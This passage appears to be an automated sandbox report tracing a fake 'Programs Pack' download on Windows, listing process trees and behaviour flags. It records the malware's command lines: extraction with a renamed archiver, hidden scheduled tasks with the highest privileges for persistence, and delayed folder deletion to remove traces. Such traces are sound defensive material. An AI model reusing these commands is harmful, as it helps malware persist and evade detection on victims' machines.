  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=4468,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:2708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=5988,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3232 /prefetch:1
  2⤵
  PID:4604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=6472,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7256 /prefetch:1
  2⤵
  PID:936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=3236,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5772 /prefetch:1
  2⤵
  PID:6856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=7280,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5976 /prefetch:1
  2⤵
  PID:7060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=7636,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7252 /prefetch:1
  2⤵
  PID:2904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=7704,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6628 /prefetch:1
  2⤵
  PID:1032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=6212,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7640 /prefetch:1
  2⤵
  PID:5300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=7668,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7928 /prefetch:1
  2⤵
  PID:5664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=6012,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7900 /prefetch:1
  2⤵
  PID:6752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=7332,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8132 /prefetch:1
  2⤵
  PID:6476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=8004,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7644 /prefetch:1
  2⤵
  PID:7060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=7172,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4444 /prefetch:1
  2⤵
  PID:7012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=7208,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6808 /prefetch:1
  2⤵
  PID:6204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=8088,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8256 /prefetch:1
  2⤵
  PID:6128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=8304,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8352 /prefetch:1
  2⤵
  PID:7024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=7672,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7748 /prefetch:1
  2⤵
  PID:4160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=7780,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7912 /prefetch:1
  2⤵
  PID:5628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=7448,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8116 /prefetch:1
  2⤵
  PID:4448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=8224,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8204 /prefetch:1
  2⤵
  PID:6652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=8412,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8400 /prefetch:1
  2⤵
  PID:6948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=8152,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8016 /prefetch:1
  2⤵
  PID:3124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=8200,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7644 /prefetch:1
  2⤵
  PID:4736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=8252,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8520 /prefetch:1
  2⤵
  PID:6708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=7396,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8024 /prefetch:1
  2⤵
  PID:1736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=8372,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8732 /prefetch:1
  2⤵
  PID:4280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=8312,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8332 /prefetch:1
  2⤵
  PID:6564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=8228,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8288 /prefetch:1
  2⤵
  PID:6228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=8104,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8440 /prefetch:1
  2⤵
  PID:3344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=8220,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8300 /prefetch:1
  2⤵
  PID:7128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=2996,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7484 /prefetch:1
  2⤵
  PID:760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=8392,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7948 /prefetch:1
  2⤵
  PID:6488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=8112,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8364 /prefetch:1
  2⤵
  PID:4580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=8752,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8120 /prefetch:1
  2⤵
  PID:6300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=7436,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6684 /prefetch:1
  2⤵
  PID:4660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=7984,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8300 /prefetch:1
  2⤵
  PID:6576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=8552,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8084 /prefetch:1
  2⤵
  PID:5672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --field-trial-handle=8876,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7680 /prefetch:1
  2⤵
  PID:2140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=8872,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8616 /prefetch:8
  2⤵
  PID:5556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3728,i,3835553938175449059,12128896603763178390,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=8584 /prefetch:3
  2⤵
  PID:1624

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6128

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5732

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x240 0x244
1⤵
PID:4504

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Download_ _Programs_Pack_February_2019 exe_(1,22_Gb)_In_free_\unpack.bat" "
1⤵
PID:5736
- C:\Users\Admin\Downloads\Download_ _Programs_Pack_February_2019 exe_(1,22_Gb)_In_free_\1.jpg
  "1.jpg" x -p4900 "image.7z" -o"."
  2⤵
  PID:4924

C:\Users\Admin\Downloads\Download_ _Programs_Pack_February_2019 exe_(1,22_Gb)_In_free_\setup.exe
"C:\Users\Admin\Downloads\Download_ _Programs_Pack_February_2019 exe_(1,22_Gb)_In_free_\setup.exe"
1⤵
- Modifies firewall policy service
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1552
- C:\Users\Admin\Documents\SimpleAdobe\mMHtqlw2y9VvLEc7BbWJFg5o.exe
  C:\Users\Admin\Documents\SimpleAdobe\mMHtqlw2y9VvLEc7BbWJFg5o.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1832
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:6188
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5708
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:628
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5032
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:5432
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HJJEGIEHIJKK" & exit
      4⤵
      PID:2844
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:4780
- C:\Users\Admin\Documents\SimpleAdobe\6LbXhRGgLiwBMQpjvYx2XC0y.exe
  C:\Users\Admin\Documents\SimpleAdobe\6LbXhRGgLiwBMQpjvYx2XC0y.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4656
- - C:\Users\Admin\AppData\Local\Temp\is-C3K8S.tmp\6LbXhRGgLiwBMQpjvYx2XC0y.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-C3K8S.tmp\6LbXhRGgLiwBMQpjvYx2XC0y.tmp" /SL5="$8043A,4861734,54272,C:\Users\Admin\Documents\SimpleAdobe\6LbXhRGgLiwBMQpjvYx2XC0y.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:4652
  - - C:\Users\Admin\AppData\Local\Audio Output Switcher\audiooutputswitcher32_64.exe
      "C:\Users\Admin\AppData\Local\Audio Output Switcher\audiooutputswitcher32_64.exe" -i
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:7100
  - - C:\Users\Admin\AppData\Local\Audio Output Switcher\audiooutputswitcher32_64.exe
      "C:\Users\Admin\AppData\Local\Audio Output Switcher\audiooutputswitcher32_64.exe" -s
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:6320
- C:\Users\Admin\Documents\SimpleAdobe\i_FDKb20r68Kq5b1UGVjTOdQ.exe
  C:\Users\Admin\Documents\SimpleAdobe\i_FDKb20r68Kq5b1UGVjTOdQ.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:5012
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5412
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:7048
- C:\Users\Admin\Documents\SimpleAdobe\HkT0EIZ9dn4VMd5PAeOMPahZ.exe
  C:\Users\Admin\Documents\SimpleAdobe\HkT0EIZ9dn4VMd5PAeOMPahZ.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5620
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:3680
  - - C:\ProgramData\KECFCGHIDH.exe
      "C:\ProgramData\KECFCGHIDH.exe"
      4⤵
      PID:5800
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:2296
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:4804
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4804 -s 1060
        6⤵
        Program crash
        
        PID:632
  - - C:\ProgramData\FIECFBAAAF.exe
      "C:\ProgramData\FIECFBAAAF.exe"
      4⤵
      PID:7712
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:6240
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFCGDAAKFHID" & exit
      4⤵
      PID:7444
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:8160
- C:\Users\Admin\Documents\SimpleAdobe\P1qvfDqMz6uu9mjPhx4Any0y.exe
  C:\Users\Admin\Documents\SimpleAdobe\P1qvfDqMz6uu9mjPhx4Any0y.exe
  2⤵
  - Executes dropped EXE
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
  PID:1244
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\AdminHJJECBKKEC.exe"
    3⤵
    PID:1472
  - - C:\Users\AdminHJJECBKKEC.exe
      "C:\Users\AdminHJJECBKKEC.exe"
      4⤵
      PID:1464
    - - C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"
        5⤵
        
        PID:4296
      - C:\Users\Admin\AppData\Local\Temp\1000015001\4b595fae1f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000015001\4b595fae1f.exe"
        6⤵
        
        PID:5308
      - C:\Users\Admin\AppData\Local\Temp\1000016001\e39870ef6d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000016001\e39870ef6d.exe"
        6⤵
        
        PID:7092
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        7⤵
        
        PID:4108
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        8⤵
        
        PID:2428
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1776 -parentBuildID 20240401114208 -prefsHandle 1684 -prefMapHandle 1676 -prefsLen 20321 -prefMapSize 241207 -appDir "C:\Program Files\Mozilla Firefox\browser" - {751e70a4-9d9a-45c8-9d57-5907c9fd83a3} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" gpu
        9⤵
        
        PID:6660
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2184 -parentBuildID 20240401114208 -prefsHandle 2176 -prefMapHandle 2164 -prefsLen 20321 -prefMapSize 241207 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec5f04a1-bd20-4eae-95c5-fd2d69d84824} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" socket
        9⤵
        
        PID:7672
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        9⤵
        
        PID:6088
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        10⤵
        
        PID:6264
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1956 -parentBuildID 20240401114208 -prefsHandle 1468 -prefMapHandle 1456 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0630c46a-de61-4e6c-806a-09044bf1c3bd} 6264 "\\.\pipe\gecko-crash-server-pipe.6264" gpu
        11⤵
        
        PID:6972
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2440 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba06c6d1-4be2-4972-bba6-96edfddfb9d0} 6264 "\\.\pipe\gecko-crash-server-pipe.6264" socket
        11⤵
        
        PID:1628
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3188 -childID 1 -isForBrowser -prefsHandle 2980 -prefMapHandle 3192 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd41c244-f75c-49e9-9f1a-265791d47f8e} 6264 "\\.\pipe\gecko-crash-server-pipe.6264" tab
        11⤵
        
        PID:2616
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3492 -childID 2 -isForBrowser -prefsHandle 4080 -prefMapHandle 2916 -prefsLen 29144 -prefMapSize 244658 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14431c47-ebae-47cc-a98c-d935eeb4cedf} 6264 "\\.\pipe\gecko-crash-server-pipe.6264" tab
        11⤵
        
        PID:7244
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5184 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5176 -prefMapHandle 5172 -prefsLen 29144 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2372d94d-6a54-4b49-a415-8d787ba88b03} 6264 "\\.\pipe\gecko-crash-server-pipe.6264" utility
        11⤵
        
